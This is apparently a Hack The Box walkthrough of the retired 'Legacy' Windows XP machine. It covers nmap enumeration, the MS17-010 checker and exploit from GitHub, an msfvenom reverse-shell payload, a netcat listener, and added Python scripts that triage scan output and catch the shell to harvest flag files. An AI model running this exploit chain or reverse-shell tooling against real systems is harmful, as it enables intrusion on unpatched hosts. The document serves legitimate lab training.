Today we're going to solve another Windows machine, "Legacy" by ch4p. It is available in the Hack The Box retired section for practice. Let's get started and walk through how to solve the lab.
Level : Easy
- Network scanning
- Nmap script scan
- Setting up a Python 2 virtual environment
- Exploiting the MS17-010 vulnerability
- Privilege escalation (no separate step is needed: the MS17-010 exploit already lands in a shell with SYSTEM, i.e. Administrator-level, privileges)
- Administrator reverse shell using netcat
IP Address : 10.129.130.212
After connecting to the Hack The Box network over their VPN, we can start. Without wasting time, let's begin with Nmap to enumerate the services running on the target machine.

Nmap's aggressive scan (-A) turns on version detection (-sV), OS detection (-O), the default NSE script set (-sC) and traceroute. It does not change the timing template, so add -T4 explicitly if you want faster timing. -Pn skips host discovery and scans the target regardless of whether it answers the ping probes; that matters here, because the host firewall filters almost everything and the box would otherwise be reported as down.
nmap -A 10.129.130.212 -Pn
Nmap scan report for 10.129.130.212
Host is up (0.17s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE       VERSION
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: 5d00h27m40s, deviation: 2h07m16s, median: 4d22h57m40s
|_nbstat: NetBIOS name: nil, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:a6:d3 (VMware)
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2021-04-25T21:15:31+03:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
The output shows SMB on ports 139 and 445 and identifies the target as Windows XP; smb-os-discovery confirms it (computer name LEGACY, workgroup HTB). Three details are worth noting: the guest account was accepted for the SMB probes, message signing is disabled, and SMB2 negotiation fails, so this is an SMBv1-only host. Windows XP has well-known, remotely exploitable SMB bugs, above all MS08-067 and MS17-010 (the bug behind EternalBlue), so the next step is to confirm them with Nmap's smb-vuln scripts.

The NSE scripts live in /usr/share/nmap/scripts; the smb-vuln* pattern selects every SMB vulnerability check at once, and quoting it keeps the shell from expanding the glob against the current directory.
nmap --script "smb-vuln*" -p 445 10.129.130.212 -Pn
Nmap scan report for 10.129.130.212
Host is up (0.17s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|
|     Disclosure date: 2008-10-23
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|       servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

Two critical findings are listed: MS08-067 (CVE-2008-4250, a stack overflow in the Server service's path canonicalisation, reachable through an RPC request) and MS17-010 (CVE-2017-0143, the SMBv1 bug exploited by EternalBlue and WannaCry). Either one gives remote code execution as SYSTEM. We are going to exploit MS17-010 without using Metasploit. Note that smb-vuln-ms10-054 reported false, and smb-vuln-ms10-061 ended in an ERROR; the latter is a script failure, not a verdict either way, so rerun it with -d if you need to know.
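Scan output like the above is easier to act on once it is reduced to a list of confirmed findings. The following script, an added example that is not part of the original write-up or of the exploit repository, parses nmap's normal output for the smb-vuln scripts and separates VULNERABLE verdicts from `false` results and script errors, keeping the title, CVE IDs and references of each finding. The embedded sample is the scan above, reflowed into nmap's line format (a constructed input for the example, not a fresh scan).

```python
"""Triage helper for `nmap --script "smb-vuln*"` output (added example, not the
write-up's own code): collect each script's verdict and list the VULNERABLE ones."""
import re

# "smb-vuln-ms17-010:" (block follows) or "smb-vuln-ms10-054: false" (one-line verdict)
SCRIPT_RE = re.compile(r"^(smb-vuln-[\w-]+):\s*(.*)$")
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")


def _entry(state="UNKNOWN", title=""):
    return {"state": state, "title": title, "cves": [], "references": []}


def parse_smb_vuln(nmap_output):
    """Map script name -> {'state', 'title', 'cves', 'references'} for each smb-vuln script."""
    results, current = {}, None
    want_title = in_refs = False    # title follows 'VULNERABLE:'; URLs follow 'References:'
    for raw in nmap_output.splitlines():
        raw = raw.lstrip()
        if not raw.startswith("|"):          # not NSE script output
            continue
        line = raw.lstrip("|_").strip()      # drop nmap's '| ' / '|_' prefix
        if not line:                         # empty line inside a block
            continue
        m = SCRIPT_RE.match(line)
        if m:                                # a new script's verdict starts here
            name, rest = m.groups()
            want_title = in_refs = False
            if rest == "false":              # one-line negative verdict
                results[name], current = _entry("NOT VULNERABLE"), None
            elif rest.startswith("ERROR"):   # script crashed: neither vulnerable nor safe
                results[name], current = _entry("ERROR", rest), None
            else:                            # multi-line finding follows
                current = results[name] = _entry()
            continue
        if current is None:
            continue
        if line == "VULNERABLE:":
            want_title = True
        elif want_title:
            current["title"], want_title = line, False
        elif line.startswith("State:"):
            current["state"] = line.split(":", 1)[1].strip()
        elif line.startswith("IDs:"):
            current["cves"].extend(CVE_RE.findall(line))
        elif line.startswith("References:"):
            in_refs = True
        elif in_refs and line.startswith("http"):
            current["references"].append(line)
    return results


def vulnerable_scripts(results):
    """Names of the scripts whose state is VULNERABLE, sorted."""
    return sorted(name for name, r in results.items() if r["state"] == "VULNERABLE")


# Constructed sample: the write-up's scan output, reflowed into nmap's line format.
SAMPLE_OUTPUT = """\
Nmap scan report for 10.129.130.212
Host is up (0.17s latency).
Host script results:
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|
|     Disclosure date: 2008-10-23
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|       servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
"""
```

Feed it real output with `parse_smb_vuln(open("scan.nmap").read())` after running nmap with -oN; `vulnerable_scripts()` then gives the list to exploit, while the ERROR entries are the ones to rerun with -d rather than to dismiss.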
To exploit the machine we use a publicly available exploit from GitHub. It is written in Python 2 and needs the impacket and pycrypto libraries. Current Kali releases ship Python 3 as the default interpreter and package impacket for Python 3, so the exploit gets its own Python 2 virtual environment: virtualenv creates it with -p python2, source activates it, and pip then installs the dependencies into that environment only, leaving the system packages untouched. That isolation is the reason for the virtual environment: the old Python 2 releases of impacket and pycrypto never collide with the Python 3 tooling the rest of the system relies on, and removing the venv directory removes them again.

virtualenv -p python2 venv
source venv/bin/activate
pip install impacket
pip install pycrypto

pip picks the newest impacket release that still declares Python 2 support; if the install fails or the exploit complains about missing impacket modules, pin an older release (impacket==0.9.22 still supports Python 2.7). pycrypto is unmaintained and may fail to build against a current toolchain; pycryptodome provides the same Crypto package and can be installed in its place.
Once the environment is ready, clone the exploit from GitHub. Before firing it, check that the target is reachable, that the libraries import correctly and that the exploit has a named pipe it can use: checker.py does exactly that. It connects to the SMB service and reports which named pipes (for example browser) it can open; send_and_execute.py needs one of those pipe names later. The commands below address the box as legacy.htb, so map the name first (add "10.129.130.212 legacy.htb" to /etc/hosts) or use the IP address directly.

git clone https://github.com/helviojunior/MS17-010.git
cd MS17-010
python checker.py legacy.htb
If the checker lists accessible pipes, the exploit runs, the libraries are installed and the target is reachable, so we can exploit the machine and get a shell.
For the payload we use an unstaged reverse TCP shell generated with msfvenom. Being unstaged, it needs no Metasploit handler: a plain netcat listener is enough. LHOST can be given as the interface name (tun0); msfvenom resolves it to the VPN address. send_and_execute.py then delivers the executable to the target and runs it through the MS17-010 exploit, using the browser named pipe that checker.py reported. Start the netcat listener on port 4445 before running it, or the shell will connect back to nothing.

msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=4445 -f exe > shell.exe
python send_and_execute.py legacy.htb shell.exe 445 browser
With the listener already waiting on port 4445, the payload connects back and nc hands us a shell. It runs with SYSTEM privileges, so no separate privilege escalation is needed and both flags are readable straight away. On Windows XP the profiles live under C:\Documents and Settings and the shell starts in C:\WINDOWS\system32, so use the full paths.

On the attacking machine:

nc -lvnp 4445

In the shell that comes back:

type "C:\Documents and Settings\john\Desktop\user.txt"
type "C:\Documents and Settings\Administrator\Desktop\root.txt"
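The listener side of the last step can be scripted instead of typing the commands by hand. The following script, an added example rather than the write-up's own procedure, plays the role of nc -lvnp 4445: it binds the port before the payload is delivered, waits for the shell to call back, swallows the cmd.exe banner, runs type on each flag file and extracts the flag. The flag paths, the assumption that the remote shell ends every response with a ">" prompt, and the 32-hex-character flag format are assumptions made for the example; demo() runs the harness against a constructed fake victim on localhost so the whole thing can be tried offline.

```python
"""Reverse-shell catcher that harvests the flags automatically (added example,
not part of the original write-up). Assumes a cmd.exe-style shell whose every
response ends with a '>' prompt, and 32-hex-character flags."""
import re
import socket
import threading

FLAG_RE = re.compile(r"\b[0-9a-f]{32}\b")   # assumed flag format

# Assumed Windows XP profile layout; full paths because the shell starts in C:\WINDOWS\system32.
FLAG_FILES = [
    r"C:\Documents and Settings\john\Desktop\user.txt",
    r"C:\Documents and Settings\Administrator\Desktop\root.txt",
]


def _recv_until_prompt(sock, prompt=b">", timeout=5.0):
    """Read until the remote cmd.exe prints its next prompt (or the socket goes quiet)."""
    sock.settimeout(timeout)
    buf = b""
    while not buf.rstrip().endswith(prompt):
        try:
            chunk = sock.recv(4096)
        except socket.timeout:
            break
        if not chunk:          # peer closed the connection
            break
        buf += chunk
    return buf.decode("latin-1", "replace")


def run_command(sock, cmd):
    """Send one command line to the shell and return everything it prints back."""
    sock.sendall(cmd.encode("latin-1") + b"\r\n")
    return _recv_until_prompt(sock)


def harvest_flags(sock):
    """Drive the shell: swallow the banner, then `type` each flag file and grep the flag."""
    _recv_until_prompt(sock)                   # "Microsoft Windows XP ..." banner + first prompt
    flags = {}
    for path in FLAG_FILES:
        out = run_command(sock, 'type "%s"' % path)
        m = FLAG_RE.search(out)
        flags[path] = m.group(0) if m else None    # None: file missing or access denied
    return flags


def make_listener(port, host="0.0.0.0"):
    """Bind the listener BEFORE the payload is delivered, exactly like `nc -lvnp 4445`."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(1)
    return srv


def listen_and_harvest(srv):
    """Accept one connection on an already-listening socket and harvest the flags."""
    conn, _peer = srv.accept()
    try:
        return harvest_flags(conn)
    finally:
        conn.close()


def _fake_victim(port, files):
    """Constructed stand-in for the box: connects back and answers `type` like cmd.exe."""
    prompt = b"\r\n\r\nC:\\WINDOWS\\system32>"
    s = socket.create_connection(("127.0.0.1", port))
    s.sendall(b"Microsoft Windows XP [Version 5.1.2600]" + prompt)
    while True:
        line = b""
        while not line.endswith(b"\n"):
            chunk = s.recv(1024)
            if not chunk:                      # handler hung up: we are done
                s.close()
                return
            line += chunk
        cmd = line.decode("latin-1").strip()
        m = re.match(r'type "(.+)"$', cmd)
        if m and m.group(1) in files:
            reply = files[m.group(1)].encode("latin-1")
        else:
            reply = b"The system cannot find the file specified."
        s.sendall(cmd.encode("latin-1") + b"\r\n" + reply + prompt)   # cmd.exe echoes the command


def demo():
    """Run the harness against the fake victim on a free local port; returns the flags."""
    fake_files = {FLAG_FILES[0]: "a1" * 16, FLAG_FILES[1]: "b2" * 16}   # constructed flags
    srv = make_listener(0, "127.0.0.1")
    port = srv.getsockname()[1]
    threading.Thread(target=_fake_victim, args=(port, fake_files), daemon=True).start()
    try:
        return listen_and_harvest(srv)
    finally:
        srv.close()
```

Against the real box, call make_listener(4445) first, run send_and_execute.py in another terminal, and then listen_and_harvest(); a None in the result means the file was missing or unreadable, which is the signal that the shell is not running with the privileges you expected.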
Finally, we have successfully exploited the machine: MS17-010 alone takes it from an unauthenticated SMB connection to a SYSTEM shell, with no separate privilege escalation required.